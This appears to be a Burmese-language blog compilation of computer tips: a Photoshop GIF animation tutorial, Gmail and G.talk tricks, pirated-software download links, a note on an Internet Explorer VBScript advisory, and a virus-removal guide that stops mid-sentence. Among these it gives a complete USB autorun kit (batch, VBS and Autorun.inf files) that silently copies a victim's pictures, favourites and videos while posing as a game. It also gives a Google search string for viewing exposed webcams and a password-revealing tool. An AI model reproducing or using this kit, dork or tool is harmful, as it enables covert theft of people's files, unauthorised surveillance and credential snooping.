Gif Animation photo တွေ လုပ်တာကို ပြောပြချင်ပါတယ်။ Software တွေ အများကြီးရှိတယ်။ နည်းတွေလည်း အမျိုးမျိုးရှိတယ်။ လက်စွဲတော် Photoshop
ကိုပဲ သုံးပြီး လုပ်ပြသွားပါ့မယ်။ အဓိက က ရည်ရွယ်တာကတော့ Gif တွေ ဘယ်လို အလုပ်လုပ်သလဲ၊ ဘယ်လို အသက်သွင်းသလဲဆိုတာကို နည်းနည်းလေးမှ မသိသေးတဲ့သူတွေ အတွက် ရည်ရွယ်ပါတယ်။
အစက အခြေခံ ၄ မျိုးလောက် လုပ်ပြပြီး ဒီပို့စ်ကို တင်ပြဖို့ပါပဲ။
အရမ်းရှည်သွားတာနဲ့အမျှ နားရှုပ်သွားမှာလည်း စိုးတယ်။ အဲဒီအတွက် ပို့စ်တွေ
ခွဲပြီး တစ်ဆင့်ပြီး တစ်ဆင့်တက်သွားပါ့မယ်။ Gif လုပ်ချင်သူများအတွက်
Follow me လို့ပဲ ဖိတ်ခေါ်ချင်ပါတယ်။ ကျနော် ပြောတတ်သလောက်
အလွယ်ဆုံးတင်ပြပေးပါ့မယ်။

Software အားလုံးလိုလိုက အတူတူပဲဗျ။ အခြေခံ သဘောတရားနားလည် သွားရင် ဘယ် Software မဆို သုံးလို့ရသွားလိမ့်မယ်။
အခု အမြဲသုံးနေတဲ့ Photoshop နဲ့ပဲ ပြပါ့မယ်။

Image Hosting by Picoodle.com



အဓိက windows သုံးခုနဲ့ အလုပ်လုပ်သွားပါ့မယ်။ 1 က မြင်ကွင်း လို့ပဲ ကျနော်ခေါ်လိုက်ပါ့မယ်။ လက်ရှိ စက္ကန့်ပိုင်းမှာ မြင်ရမယ့် အကွက်ပေါ့။ 2 က Layer manager ပေါ့။ 3 ကတော့ Time Line ပဲဖြစ်ပါတယ်။ (Flash နဲ့ အခြားသော Gif maker များလည်း ဒီနည်းအတိုင်းပါပဲ)


ရုပ်ရှင်တွေလိုပေါ့ဗျာ။ ရုပ်သေဖလင် တစ်ကွက်ခြင်းစီကို flow လေးနဲ့ ပေးသွားလိုက်ရင် animation
ဖြစ်သွားပါတယ်။ အဓိက က timeline က frame ဖြစ်ပါတယ်။ frame 1 ကို နှိပ်တယ်။
မြင်ကွင်းမှာ မိမိပေါ်စေချင်တာကို layer manager မှာပြုပြင်တယ်။ အဲလိုပဲ
frame 1 ကနေစလို့ တစ်ခုပြီး တစ်ခု သွားစေပြီး မိမိဖြစ်စေချင်တဲ့ ပုံကို
ဖော်သွားတာပါ။
အောက်မှာ ကြည့်လိုက်ပါ။ frame 2 ခု ရှိတယ်။ layer 2 ခု ရှိတယ်။ frame 1 ကို နှိပ်ထားပြီး layer 1 မှာ 1 လို့ ရေးလိုက်ပါတယ်။
Image Hosting by Picoodle.com

ပြီးရင် Frame 2 ကို နှိပ်ပြီး 1 လို့ရေးထားတဲ့ layer ကို မျက်စိမှိတ်ခိုင်းပြီး ဖျောက်လိုက်ပါတယ်။
Image Hosting by Picoodle.com
(ပထမပုံမှာ frame 1 ကနေ 2 ကို မျှားပြထားတာက time line သွားမယ့် flow ကို
ပြချင်လို့ပါ။ ဒုတိယပုံမှာ frame ကနေ မျှားထိုးပြတာက frame မှာ
မြင်ရတဲ့အတိုင်း မြင်ကွင်းက လိုက်ပြောင်းတာကို ပြောပြချင်တာပါ။ )

အဲဒီအတိုင်းလေး လုပ်ပြီး timeline ကို 0.2 စက္ကန့်နှုန်းနဲ့ အဆက်မပြက် သွားစေလိုက်တဲ့အခါမှာ အောက်ပါအတိုင်း ပုံရပါတယ်။
Image Hosting by Picoodle.com

အပေါ်မှာ ပြောခဲ့တဲ့ နည်းကိုပဲသုံးပြီး gif မှာ အလွယ်ဆုံး ပုံတစ်ခုကို
လုပ်ပြပါ့မယ်။ ကျနော် blockquote မှာသုံးတဲ့ မီးလုံး ပုံလေး ကို
တွေ့မယ်ထင်တယ်။ အောက်မှာ ကြည့်ကြည့်ပါ။



spotlight သဘောမျိုး တဖြတ်ဖြတ် လင်းနေပါတယ်။ အဲဒါကို အစအဆုံးလုပ်ပြပါ့မယ်။ (photoshop ကို အခုမှ စတဲ့လူရော၊ gif ကို
မလုပ်ကြည့်ဘူးတဲ့လူရော နားလည်အောင် လွယ်လွယ်လေးကို ချဲ့ကားရေးပါ့မယ်)
New page တစ်ခုယူမယ် နောက်ခံအနက် ခြယ်မယ်။ (ဒီလောက်ကတော့ ပြနေစရာမလိုလောက်ဘူးထင်ပါတယ်)
ပြီးရင် Tool box က Custom shape tool ကို ရွေးပါတယ်။ Options bar မှာ မီးလုံးပုံလေးကို ရွေးပါတယ်။
Image Hosting by Picoodle.com

မီးလုံးပုံလေးတစ်ခုကို ဆွဲပါတယ်။ အဲဒီမီးလုံး layer လေးပေါ်လာပါတယ်။ shape 1 ဆိုတဲ့နာမည်နဲ့ပေါ့။ shape 1 layer ကို drag ဆွဲပြီး layer manager က create new layer ခလုပ်လေးရဲ့ အပေါ်မှာ ချပေးလိုက်ပါတယ်။
Image Hosting by Picoodle.com

Shape 1 Copy ဆိုပြီး နောက်ထပ် layer တစ်ခု ထပ်ထွက်လာပါတယ်။ Menu bar က Window - Animation ကို နှိပ်ပါတယ်။
Image Hosting by Picoodle.com

အောက်မှာ မြင်တဲ့အတိုင်း time line ပေါ်လာပါတယ်။
Image Hosting by Picoodle.com

Rectangular Marquee Tool (Shortcut - M) ကို သုံးပြီး မီးသီးဖင်ကို select လုပ်ပါတယ်။
Image Hosting by Picoodle.com

Shape 1 Copy ဆိုတဲ့ layer ကို Right-Click နှိပ်ပြီး Rasterize Layer ကို နှိပ်လိုက်ပါတယ်။
Image Hosting by Picoodle.com

ပြီးရင် ကီးဘုတ်က Delete ကီးကို နှိပ်လိုက်ပါတယ်။ Shape 1 Copy layer မှာ မီးသီးဖင် ပြတ်သွားပါပြီ။ (မီးသီး မီးလင်းတဲ့ ပုံ လုပ်မှာပါ။
မီးသီးဖင်ကပါ အလင်းတွေ မထွက်စေချင်တဲ့အတွက် အလင်းထွက်မယ့် layer မှာ
ဖင်ကိုဖြတ်ပစ်လိုက်တာပါ)
Image Hosting by Picoodle.com

Shape 1 Copy layer ကိုပဲ Right-Click နှိပ်ပြီး Blending Options ကိုနှိပ်ပါတယ်။ Outer Glow ကို အောက်ပါအတိုင်း ပြောင်းလဲချိန်ပေးပါ။
Image Hosting by Picoodle.com

ပြီးရင် time line က frame 1 ကို Drag ဆွဲပြီး Duplicates Selected frames ဆိုတဲ့ ခလုပ်ပေါ်မှာ လွှတ်ပေးလိုက်ပါတယ်။
Image Hosting by Picoodle.com

frame နှစ်ခု ရလာပါတယ်။ ကီးဘုတ်က Ctrl ကီး ကို ဖိထားရင်း frame နှစ်ခုလုံးကို click လိုက်ပါတယ်။ နှစ်ခုလုံး select လုပ်တာပါ။ ပြီးတော့ 0 sec. ဆိုတဲ့ အချိန်ရဲ့ ဘေးမှာ Down arrow လေး တွေ့ပါလိမ့်မယ်။ အဲဒါကို နှိပ်ပြီး 0.2 sec လို့ ပေးလိုက်ပါတယ်။ (မိမိ ကြိုက်နှစ်သက်ရာ အချိန် ထားပြီး စမ်းကြည့်လို့ရပါတယ်)
Image Hosting by Picoodle.com

frame 1 ကို click ပြီး layer manager က shape 1 copy ကို ဖြောက်ထားလိုက်ပါတယ်။ (မျက်လုံးပုံ နေရာလေးကို နှိပ်ရင် ပျောက်သွားတာ ပြောခဲ့ပြီးပါပြီ)
Image Hosting by Picoodle.com

frame 2 ကို click ပြီး shape 1 copy ကို ပြန်ဖော်လိုက်ပါတယ်။ (အဲဒီနေရာပဲ ပြန်နှိပ်လိုက်ရင် ပြန်ပေါ်လာပါတယ်)
Image Hosting by Picoodle.com

time line အောက်က play ခလုပ်လေး နှိပ်ကြည့်ပါ။ အောက်ပါတိုင်း မြင်ရပါလိမ့်မယ်။
Image Hosting by Picoodle.com

အဲဒီ preview ကိုကြည့်ပြီး flow အနှေးအမြန် စသည်ဖြင့် မိမိ ပြောင်းလဲချင်တာကို ပြောင်းလဲနိုင်ပါတယ်။
save တော့မယ်ဆိုရင်တော့ File - Save For Web & Devices (shortcut - Alt+Ctrl+Shift+S) ကို နှိပ်ပါတယ်။
Image Hosting by Picoodle.com

အဲဒီမှာလည်း preview အနေနဲ့ ကြည့်လို့ရပါတယ်။ play ခလုပ်လေးရဲ့ အပေါ်မှာ looping Options : ကို Forever ပေးထားတာ တွေ့ရမှာပါ။ Forever ဆိုရင် မိမိ မီးသီးက မှိန်လိုက် လင်းလိုက် အဆက်မပြက် ဖြစ်နေမှာပါ။ Once လို့ပေးလိုက်ရင်တော့ တစ်ခါဖွင့်မှ တစ်ကြိမ်ပဲ လင်းပါလိမ့်မယ်။
Image Hosting by Picoodle.com

Save ကို နှိပ်ပြီး မိမိပေးချင်တဲ့ နာမည်ပေး save နိုင်ပါတယ်။
Image Hosting by Picoodle.com
Image Hosting by Picoodle.com

ရလာဒ်က အောက်ပါအတိုင်းဖြစ်ပါလိမ့်မယ်။
Image Hosting by Picoodle.com

frame နှစ်ကွက်ထဲ သုံးပြီး နည်းနည်းလေး နားလည်သွားအောင် ပြလိုက်တာပါ။ first
tutorial ပေါ့။ နားလည်မယ်လို့ ထင်ပါတယ်။ နောက်ထပ်ပြီး frame အကွက်တွေ
တိုးသွားမယ်။ time ကို တစ်ပြေးညီ မဟုတ်ပဲ လိုသလိုပြောင်းမယ်။ tweens
animation frames ကို သုံးပြီး တဖြည်းဖြည်း မှိန်တာ ပေါ်တာတွေ၊ motions
တွေကို ဆက်လက် တင်ပြသွားပါ့မယ်။ အလွယ်ဆုံးဖြစ်အောင် ရေးလိုက်တာပါ။ ဒီထက်
ပိုလွယ်အောင် ကျနော် မရေးတတ်တော့ပါဘူး။ လူတိုင်းနားလည် လိမ့်မယ်လို့
ထင်ပါတယ်။ အဆင်မပြေတာလေးတွေ ပြန်အော်ပါဦးဗျာ ...

Photoshop CS 3 ကို သုံးခဲ့တာပါ။
1.လျင်မြန်တဲ့စာပို့နည်း
2.Email အသစ်တွေရောက်နေတာကို ဘယ်လိုသိနိုင်မလဲ
3.လုံခြုံရေးပြည့်ဝတဲ့ Connection ကိုသုံးပါ
4.Spam တွေဟာ ဖျက်ဖို့မလိုပါ
5.(+ Option) အကြောင်း
6.Label များကို အသုံးချပါ
7.မှတ်စုတို (Notes) များပြုလုပ်ခြင်း

..................................... အစရှိတဲ့ ဂျီးမေး မှာ လူသိနည်းနေသေးတဲ့ အချက် 23 ခု ကို ဖတ်ချင် သိချင်ရင်တော့ . . .

http://www.mediafire.com/?ememzwhndzm



ဒေါင်းလော့ဆွဲပြီးဖတ်ရှု့ နိုင်ပါသည်။ ဖိုင်ကကြီးတော့ ဒါရိုက်တင်ပေးလို့ မရလို့ ပါ။အားလုံးပျော်ရွှင်နိုင်ပါစေ

G.talk မှာ Invisible နဲ့ ပုန်းချက်နေတဲ့သူ သိအောင်လုပ်နည်း

ဒီလိုချက်တာ ကိုသဘောလောက်သိအောင်ကျွန်တော်ပြောချင်တာပါ တစ်ချို့ကျတော့ မအားလို့ အလုပ်ကိစ္စတွေကြောင့် သူငယ်ချင်းတွေကိုပြန်မပြောနိုင်တဲ့သူတွေရှိပါတယ်
သူတို့ကိုပြန်လည်နားလည်ပေးစေချင်ပါတယ် ။

အရင်ဦးဆုံးကိုယ်သိချင်တဲ့ သူအကောင့် Offline ကိုပုံမှန်ချက်သလိုပဲဖွင့်လိုက်ပါ ပြီးရင် အပေါ်နားလေးက Send voicemail ရှိမယ် သူ့ဘေးမှာ Call ရှိမယ် Call ဘေးကမှ
အောက်ဘက်ညွှန်ပြနေတဲ့ ခလုပ်ကလေးတစ်ခုတွေ့လိမ့်မယ် အဲဒီခလုပ်ကိုကလစ်လိုက်ပါ။

အပေါ်ဆုံးမှာ Emails ဆိုပြီးတော့ရှိတယ် သူ့အောက်က Go off the record ဆိုတာလေးကို ကလစ်ပြီး အရင်ကချက်သလို စာတစ်ခုခု ရိုက်ထည့်ကြည့်လိုက်ပါ ။

တစ်ကယ်လို့ သူ Invisible နဲ့ ပုန်းချက်နေတာမဟုတ်ခဲ့ရင် ,,,,,,,,,,,@gmail.com is offline and can’t receive messages right now. လို့ပြပါလိမ့်မယ် ဒါဆိုရင် သူတစ်ကယ် Offline ပါ ။

အဲလိုမဟုတ်ပဲနဲ့ ဘာစာမှ တက်မလာဘူးဆိုရင် သူပုန်းချက်နေတာပါ ။

Invisible နဲ့ရှိမရှိ စမ်းပြီးပြီဆိုရင်တော့ ခုနက အောက်ဘက်ညွှန်ပြနေတဲ့ ခလုပ်ကလေးကနေ “Stop chatting off the record” ဆိုတာလေးကို ပြန်ကလစ်ပေးလိုက်ပါအုံး ဒါမှ သူနဲ့ နောက်ချက်ထားတာတွေ ပြန်ကြည့်လို့ရမှာပါ

“Stop chatting off the record” လုပ်ထားလို့ရှိရင် ကိုယ်နဲ့ သူနဲ့ ချက်ထားတာတွေကို သူ့မေလ်းမှာရော ကိုယ့်မေးလ်မှာပါ သိမ်းထားခြင်းမရှိပါဘူး ၊ တစ်ကယ်လို့ ကိုယ်ပြောတာတွေကို သူများဆီမှာ သိမ်းမထားစေချင်ရင် “Stop
chatting off the record” လုပ်ထားလိုက်ယုံပါ ။

အဆင်ပြေပါစေ ..
ခုကျွှန်တော်တို့ password ရိုက်ရင်
အမည်းရောင် အလုံးတွေပေါ်လာတယ်မလား။ အဲဒါကို ခုပေးတဲ့ ဟာလေးနဲ့ ကြည့်လိုက်ရင်ရတယ်ဗျ။
password မေ့နေသူတွေအတွက်တော့ အဆင်ပြေတာပေါ့နော်။
ကဲ အောက်မှာ ဒေါင်းလိုက်ပါနော်။

အောက်ကလင့်လေးမှာ ဒေါင်းလော့သွားဆွဲလိုက်ပါ။

http://www.mediafire.com/?tinkymdyumd



အားလုံး အဆင်ပြေပါစေဗျာ

မှတ်ချက်။ ။ သူများကျန်ခဲ့ တဲ့  password ကိုတော့ မကြည့်စေချင်ဘူးနော်


ပထမဦးဆုံး 8GB ရှိတဲ့ USB flash Drive တစ်ခုကိုယူရပါမယ်…
ပြီးရင်တော့ အဲဒီထဲမှာ ဘာမှမရှိအောင် ရှင်းထားပေးရပါ့မယ်….
ဆိုလိုတာက Format ချလိုက်ပေါ့ဗျာ။

၁) အနေနဲ့ အဲဒီ USB Flash Drive ထဲမှာ Folder တစ်ခုကိုတည်ဆောက်ရပါ့မယ် နာမည်ကိုတော့ All လို့အမည်ပေးထားလိုက်ပါ။

၂) ကတော့ အောက်ပါကုဒ်လေးတွေကို ကူးယူပြီး File.bat ဆိုပြီးနာမည်ပေးလိုက်ပါ။ ပြီးရင်တော့ စောစော က USB flash Drive ထဲမှာသိမ်းလိုက်ပါ။





@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%pictures" "%drive%allMy pics"
%backupcmd% "%USERPROFILE%Favorites" "%drive%allFavorites"
%backupcmd% "%USERPROFILE%videos" "%drive%allvids"
@echo off
cls




၃) အခုဖော်ပြမဲ့ ကုဒ်လေးတွေကိုတော့ Launch.bat လို့အမည်ပေးပြီး Drive ထဲမှာသိမ်းထားလိုက်ပါဗျာ


wscript.exe invisible.vbs file.bat



၎) အနေနဲ့ကတော့ ..ဒီကုဒ်လေးတွေကို invisible.vbs လို့မည်ပေးပြီးတော့ သိမ်းလိုက်ပါဗျာ..
ကဲအားလုံးပြီးသွားရင်တော့ဗျာ

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False



နောက်ထပ်သူတို့ ကို Run ဖို့က Autorun.inf ဆိုတဲ့ဖိုင်လေးလိုလာပါပြီး
Autorun ဖိုင်ကိုဒီလိုလေးရေးမယ်ဗျာ….



[autorun]
icon=drive.icon
open=launch.bat
action=Click ok to Run game for Windows
shellopencommand=launch.bat



ဒီ icon ဆိုတဲ့နေရာမှာ မိမိ ထည့်မည် icon လေးရဲ့နာမည်လေးပေးရမှာပါ ဥပမာ ကို့ Icon လေးရဲ့နာမည်က USBFlashCardWithCardReader2 ဆိုရင်တော့
USBFlashCardWithCardReader2.icon လို့မည်ပေးရမှာပါ။ ဒီလောက်ဆို သဘောပေါက်မယ်လို့ထင်ပါတယ်...
ဖိုင်တွေအားလုံးကို Save လုပ်တဲ့နေရာမှာ File type ကို All ထားပေးရမှာဖြစ်ပါတယ်။

ကဲအားလုံးပြီးသွားရင်တော့ My Computer ထဲက Drive ထဲမှာ လူကြီးမင်ရဲ့ Flash Drive လေးကို Icon လှလှလေးနဲ့တွေ့နေရပြီး...

စမ်းသပ်လို့ရပါပြီခင်မျာ..ဖိုင်တွေကို All Folder ထဲမှာ သူအလိုလျှောက်ဆွဲထည့်ထားပါလိမ့်မယ်...
အဆင်ပြေပါစေဗျာ..

Google Search Engine ကိုသုံးပြီးတော့ webcams တွေကို Hack ကြည့်ရအောင်။
အောက်မှာပေးထားတဲ့ ကုဒ်လေးကို Google Search ထဲမှာ ရိုက်ထည့်လိုက်ပါ။ webcam လင့်တွေ ကျလာလိမ့်မယ်။
ကြိုက်တာကို ရွေးချယ်ပြီး ကြည့်နိုင်ပါတယ်။


inurl:/view/index.shtml

Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2, Windows XP Service Pack 3, and Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2, Windows Server 2003 with SP2 for Itanium-based Systems, and Windows Server 2003 x64 Edition Service Pack
2


စသည့် Windows Operating System များကို အသုံးပြုသူများ သတိပြုရန်မှာ Microsoft Security Advisory
(981169) အရ Windows Help File VBScript Vulnerabilty မှတဆင့် Remote Code
Execution ကို Internet Explorer သုံးနေစဉ်တွင်
ပြုလုပ်နိုင်ကြောင်းတွေ့ရှိရသည်။

User တစ်ယောက်က အန္တရယ်ရှိစေတဲ့ Website တစ်ခုကို ၀င်ရောက်ခါ ၄င်း Website အတွင်းတွင် ( ဆိုလိုတာက -
Website တစ်ခုဝင်လိုက်တယ် အဲ့ site က Press F1 to Get your Bonus ..
စသည်ဖြင့်ပေါ့) user မှ F1 key ကိုနိုပ်ခြင်းဖြင့် attacker ဖန်တီးထားသော
malicious code များကို အထက်ပါတွေ့ရှိရသော vulnerability မှတဆင့်
ဝင်ရောက်လာမည်ဖြစ်သည်။

ဒီ vulnerability က Windows Vista/Windows 7 အသုံးပြုသူတွေအတွက် မထိရောက်ပေမဲ့ ယနေ့အချိန်မှာ Windows XP
ကိုတွင်တွင်ကျယ်ကျယ်သုံးနေတုန်းဖြစ်ပါတယ်။

Xilisoft XviD Converter
ဗီဒီယို နဲ့ MP3 တွေပြောင်းလဲမှုလုပ်မယ်ဆိုရင် Xilisoft ရဲ့ Convertor တွေကလည်း ထိပ်ဆုံးမှာနေရာယူထားကြပါတယ်။ လူတော်တော်များမျာားလည်း နှစ်သက်ကြတယ်။ သူက
AVI, MKV, WMV, MP4, MOV, MPEG, MPA, MPG, 3GP, 3G2, DAT, VOB, QT, RM,
RMVB, ASF နဲ့ XviD တွေကိုလည်း Support လုပ်တဲ့အတွက် Convertor
တစ်ခုတည်းနဲ့ အများကြီးအသုံးပြုလို့ရသွားတာပေါ့။ နောက်တစ်ခုကတော့ ယခု
Video Convertor က Music & Video တွေရဲ့ Bitrate/ Frame rate တွေကို
စိတ်ကြိုက်ပြင်ဆင်သတ်မှတ်လို့ရပါတယ်။ မရင်းလိပ်စာကတော့
http://www.xilisoft.com/ ပါ။




အသုံးပြုမယ်ဆိုရင် အောက်ပါ Link တွေမှနေပြီး Download ယူသုံးနိုင်ပါတယ်။

http://uploading.com/files/6d9m5a36/Xilisoft.rar/

http://rapidshare.com/files/345787755/Xilisoft.rar


တကယ်တမ်း ကွန်ပျူတာ ဗိုင်းရပ်စ် တွေကို ရှင်းလင်းရတယ်ဆိုတာ လွယ်ကူတဲ့ကိစ္စမဟုတ်သလို မိမိရဲ့ အဖိုးတန်တဲ့ အချိန်တစ်ချို့ကိုပေးဆပ်ကြရတာပါ။ ဘယ်ကွန်ပျူတာမှ Virus တစ်မျိုးတည်း
ရတယ်ဆိုတာ မရှိပဲနဲ့ မိမိရဲ့အိမ်မှာ ပုရွက်ဆိတ်လေးတွေ ၀င်လာသလိုပါပဲ
နောက်ဆုံး တပ်စုကြီးနဲ့ပဲ ပြန်လည်ထွက်ခွာသွားကြတာပါ။ Antivirus ဆိုတာ
အကောင်းမွန်ဆုံး ကာကွယ်ရေး တပ်ဖွဲ့ကြီးဖြစ်တယ် သို့ပေမယ့်လည်း ၄င်း
Antivirus က out of date ဖြစ်နေမယ်ဆိုရင် အသုံးဝင်တဲ့ antivirus program
တစ်ခုဖြစ်လာမှာမဟုတ်ပါဘူး။ ဒီတော့ virus တွေကို ခုခံတိုက်ခိုက်ဖို့၊ virus
ရှိမရှိဆိုတာ သိဖို့အတွက် သံသယဖြစ်ဖွယ်ရာ processing တွေ၊ ဖိုင်တွေကို
သိဖို့လိုပါတယ်။ ဒီလို ဒုက္ခပေးနိုင်တဲ့ virus တွေကို config, taskmanager
နဲ့ autoruns tools တွေနဲ့ ရှာဖွေကြရတယ်။ ဒါကြောင့် သံသယ ဖြစ်ဖွယ် process
တွေကို မိတ်ဆွေတို့အနေဲ့ ရှာတော့မယ်ဆိုရင် ဒီ file က ဘယ်ကလာတာလဲ၊ registry
keys တွေအတွက် လေးလံစေတဲ့ ဖိုင်တွေလား၊ ဘယ်လို services တွေကို
အသုံးပြုနေလဲ၊ ဘယ် startup program တွေထဲမှာ ဘယ်လိုဖိုင်တွေအနေနဲ့
ဝင်ရောက် အသုံးပြုနေလဲဆိုတာကို သိဖို့လိုပါတယ်။ အကယ်၍များ virus ကို
ရှင်းလင်းလိုက်ဖို့ ၂ နာရီလောက် အချိန်ကြာမယ်ဆိုရင်
အဲ့လိုရှင်းလင်းလိုက်ဖို့ထက် Operating System ကိုပြန်လည်၍
အသစ်တင်လိုက်မည်ဆိုသော အချက်နဲ့ ညှိနှိုင်းရပါလိမ့်မယ်။ ဒါက
အချိန်ကုန်မခံစေချင်တဲ့အတွက် ကြောင့်ပင်ဖြစ်သည်။





Virus ရဲ့ အဓိပ္ပါယ်။
အရိုးရှင်းဆုံး ဝေါဟာရတစ်ခုအနေနဲ့ Computer Virus ဆိုတာ သူကိုယ်တိုင် ဖိုင်တစ်ခုကို ဖန်တီးနိုင်တယ် ကူးယူနိုင်တယ်။
လုံခြုံရေး ဆိုင်ရာ program တွေကို စိန်ခေါ် ခြိမ်းခြောက်နိုင်တဲ့
အစွမ်းတွေရှိတယ်။ တစ်ချို့ virus တွေက သတ်မှတ်ထားတဲ့ ဖိုင်တွေကို delete
လုပ်နိုင်တယ်၊ တစ်ချို့က user တွေ ကွန်ပျူတာရဲ့ password နဲ့ information
တွေကို ခိုးယူနိုင်တယ်။ တစ်ချို့ကြပြန်တော့ မိမိရဲ့ ကွန်ပျူတာကို OS
တက်မလာလောက်အောင် ဖျက်စီးမှု့လုပ်နိုင်ကြတယ်။
အကြမ်းဖျင်းအားဖြင့် -
Virus = ကိုယ်တိုင် copy ကူးယူနိုင်သော file တစ်ခု
Trojan = virus သို့မဟုတ် malware တွေပါဝင်သော program တစ်ခု
Spyware = ကွန်ပျူတာ ကိုထိန်းချူပ်ခွင့်ရရန် သိုမဟုတ် ကြားဖေါက်ဝင်ရောက်နိုင်အောင် ဖန်တီးထားတော့ ဖိုင် သို့မဟုတ် program တစ်ခု
Maleware = ကွန်ပျူတာအား ပိုင်ရှင်၏ ခွင့်ပြုချက်မရပဲ ပျက်စီးရာ ပျက်စီးကြောင်း ဖန်တီးနိုင်သော program
Worm = Network အပေါ်မှာ လမ်းသလားသော virus

Virus ဖယ်ရှားခြင်း။
မိမိကွန်ပျူတာမှာ virus ရှိသည်ဟု ယူဆပါက Up to Date ဖြစ်နေသော Antivirus program တွေနဲ့
စစ်ဆေးပေးပါ။ Antivirus program က detect သိလို့ ဖယ်ရှားနိုင်တယ်ဆို
ရင်တော့ ကံကောင်းတာပေါ့။ AV တွေ Detect သိတယ်.. Remove
မလုပ်နိုင်တော့ဘူးဆိုရင်တော့ ဖြစ်နေတဲ action နဲ့ file ကို မှတ်သားထားပါ
.. ပြီးရင် Search Engine မှာ ၄င်းဖိုင် နဲ့ ၄င်း virus ရဲ့
ဒုက္ခပေးပုံတွေကို ပြောဆို အကူအညီတောင်းပါ။
ပြီးလျင်လမ်းညွန်အတိုင်းဖြေရှင်းမှာ။ ဖြေရှင်းမှု့မလုပ်ခင်တိုင်းမှာ
မိမိရဲ့ အရေးကြီးတဲ့ ဖိုင်တွေကို backup လုပ်ထားပါ။

Virus Detect မသိခဲ့ရင်
ကွန်ပျူတာမှာ AntiVirus / AntiSpyware program တွေအနေနဲ့ Detect မသိဘူး သို့သော်
ကွန်ပျူတာက အရင်အတိုင်းပဲ နှေးမြဲနှေးနေမယ်ဆိုရင်တော့ background
processes တွေကို ကြည့်ရပါလိမ့်မယ်။ ဒီအတွက် special tool လေးတွေက အဓိက
တာဝန်ထမ်းဆောင်ရလိမ့်မယ်။ ဥပမာ :- task manager, autoruns, process
explorer and hijackthis တို့လိုပေါ့။

Checking Running Processes
ကျွန်တော်တို့ PC တစ်လုံး Error ဖြစ်တယ်ဆိုရင် ပထမဦးဆုံးအကြိမ် task manager (Ctrl +
Alt+ Del) ကို ခေါ်ကြည့်တယ်. ပြီးရင် ဘယ်လို file နဲ့ services တွေ Run
နေလဲ Memory usage တွေဘယ်လောက်များများကို ဘယ်လို file တွေက
အသုံးပြုနေလဲဆိုတာကိုကြည့်မယ်။ ပြီးရင် System Configuration Ultility
(RUN>msconfig) က နေဘယ် serivces တွေ နဲ့ ဘယ်ဖိုင်တွေက Operating
System (Windows ) startup မှာ ၀င်ရောက်နေလဲဆိုတာကိုပါကြည့်ပါ။အကယ်၍
starup မှာ ထူးထူးခြားခြား file အမည်လေးတွေနဲ့ ၀င်နေတာတွေ့ရင်


တို့မှာသွားပြီး ဖိုင်အမည်ကို ရိုက်ထည့်စစ်ဆေးကြည့်ပါ။ ဘာကြောင့်လဲဆိုတော့ တစ်ချို့
ဖိုင်တွေက system file တွေနဲ့ပုံစံတူတွေဖြစ်နေတတ်တယ်။ မိမိကွန်ပျူတာအတွက်
အရေးမပါတဲ့ processes တွေကို end လုပ်ပါ။

System Configuration Utility


RUN dialog box မှာ msconfig ဆိုပြီးတော့ ရိုက်ထည့်လိုက် ပြီးရင် System
Configuration Utility ဆိုတာပေါ်လာမယ်... ဒါကတော့ Microsoft Windows
မှာဆိုရင် အကောင်းဆုံး ကွန်ပျူတာကိုပြင်ဆင်မှု့ပိုင်းမှာ အထောက်အကူပြုတဲ့
utility ပဲဖြစ်တယ်။ နောက်ဆုံး ဘာမှမသိဘူးပဲထား startup tab မှာ Disable
All ဆိုတာကို နိုပ်မယ်။ နောက် Services tab မှာ Hide All Microsoft
Services ဆိုတာကို အမှန်ခြစ်မယ်. ပြီးရင် Disable All ဆိုပြီးနိုပ်
restart လုပ်လိုက်ရင် မိမိရဲ့ ကွန်ပျူတာ system ဟာပုံမှန်ထက်သိသိသာသာကို
ကောင်းမွန်လာတာကိုတွေ့ရလိမ့်မယ်။ ဒီပုံစံနဲ့ တစ်ခါတစ်လေ ဘာ error မှန်းမသိ
(အထူးသဖြင့် Software Conflict ဖြစ်၍ windows normal ၀င်မရခြင်း) တဲ့
ပြဿနာတွေကို F8 နိုပ်ကာ Safe Mode ထဲကနေ ပြင်ပြီးသုံးသွားရင်တောင်
အဆင်ပြေပါတယ်။

All-in-one diagnostic Tools
Autoruns





ဒီ software က Task manager, msconfig and the services list တွေ စသည့် system diagnostic အစုံပါတဲ့ freeware လေးတစ်ခုပါ။

Process Explorer



ဒါလေးကတော့ အပေါ်က ပုံစံပါပဲ.. သူ့ရဲ့ ထူးခြားချက်ကတော့ file တစ်ခုခြင်းစီအတွက် ကိုယ်ပိုင် ထိန်းချုပ်မှု့ပါ၊ CPU,IO,VM တွေအပြင် performace graphed
တွေပါတယ်။

Hijack This



Technician တွေနဲ့ ကွန်ပျူတာ နဲ့နည်းစပ်သူတွေတော်တော်တော်များများသိကြတဲ့ Tool ပါ။ ဒါပေမဲ့ ၄င်းတို့မှာ ပါဝင်တဲ့ R0,R1,R2,R3 / F0,F1,F2,F3 / 01 / 04 / 23
စသည့် notable entries လေးတွေကို သတိမထားမိတတ်ပါဘူး။ R0,R1,R2,R3 ဆိုတာက
အင်တာနက် အွန်လိုင်း အမှားအယွင်းတွေ၊ အထူးသဖြင့် Internet Browser
တွေပေါ့... အသေးစိတ်ကို


Malware Bytes



Antivirus Program တွေက ၄င်းတို့ရဲ့ Virus Signiture တွေနဲ့ငြိတဲ့ ဖိုင်တွေကို စစ်မယ်၊ Anti Spyware တွေက Registry Entries မှာ ၄င်းတို့ Spyware
အဖြစ်သတ်မှတ်ထားတဲ့ ဖိုင်တွေကို စစ်မယ်။ ဒါပေမဲ့ တစ်ချို့ malware တွေကို
antivirus တွေ antispyware တွေ Detect သိသော်ငြားလည်း သူတို့ကို Delete
မလုပ်ဘူး( Delete လုပ်ဖို့လည်း သူတို့မှာ Power မရှိသလို၊ System File
လား၊ ဘာလား မခွဲခြားနိုင်ခြင်း၊ ၄င်း malware တွေနဲ့ familiar
ဖြစ်နေခြင်း)။ (မှတ်ချက် - တစ်ချို့ Antivirus program တွေက အဲ့လို
malware ရရင် တွေ့သမျှ အကုန်ဖျက်ပါတယ်...ဘာဖိုင်မှကိုမထားပါဘူး။
ပြီးရင်တော့ စက်တောင် မတက်တော့ဘူး။ မိမိရဲ့ ကွန်ပျူတာက malware ကိုက်လို့
